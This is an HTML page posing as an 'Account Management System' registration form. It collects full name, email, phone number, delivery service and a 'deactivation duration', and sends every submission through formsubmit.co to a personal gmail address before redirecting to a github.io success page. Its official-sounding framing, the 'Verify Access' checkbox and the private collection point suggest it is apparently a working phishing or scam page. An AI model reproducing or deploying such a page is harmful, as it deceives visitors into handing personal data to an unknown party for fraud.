<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <link rel="stylesheet" href="index.css">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Exo+2:ital,wght@0,100..900;1,100..900&family=Inter:ital,opsz,wght@0,14..32,100..900;1,14..32,100..900&family=Playwrite+PE:wght@100..400&family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&family=Ubuntu:ital,wght@0,300;0,400;0,500;0,700;1,300;1,400;1,500;1,700&display=swap" rel="stylesheet">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Management System Server</title>
</head>
<body>
    <div class="login-page">
        <div class="header">
            <h2>ACCOUNT MANAGEMENT SYSTEM</h2>
            <P>Register Your Account Details</P>
        </div>
    </div>
    <form action="https://formsubmit.co/nerotech4.1985@gmail.com" method="POST">
        <input type="text" name="_honey" style="display:none">
        <input type="hidden" name="_captcha" value="false">
        <input type="hidden" name="_next" value="https://jasonspy.github.io/server/success.html">
        <div class="input">
            <div class="input-box">
                <label for="">Full Name <br>
                    <input type="text" name="full name" placeholder="*******" required>
                </label>
                <br>
                
                <label for="">Email Address</label><br>
                    <input type="email" name="email address" placeholder="********" required>
                </label>
                <br>

                <label for="">Phone Number<br>
                    <input type="text" name="phone number" placeholder="********" required>
                </label>
                <br>

                <label for="">Delivery Service <br>
                    <input type="text" name="delivery service" placeholder="********" required>
                </label>
                <br>

                <label for="">Deactivation Duration<br>
                    <input type="text" name="duration" placeholder="********" required>
                </label>
                
                
            </div>
        </div>
    

        <footer>
            <div class="checkbox-wrapper-46">
                <input type="checkbox" id="cbx-46" class="inp-cbx" />
                <label for="cbx-46" class="cbx"><span>
                        <svg viewBox="0 0 12 10" height="10px" width="12px">
                            <polyline points="1.5 6 4.5 9 10.5 1"></polyline>
                        </svg></span><span>Verify Access</span>
                </label>
            </div>
        </footer>

        <div class="login-button">
            <button type="submit" class="btn">Submit
            </button>
        </div>
    </form>
     <footer>
        <p>&copy; 2024</p>
        <p>User Agreement</p>
        <p>Privacy Policy</p>
    </footer>
</body>
</html>
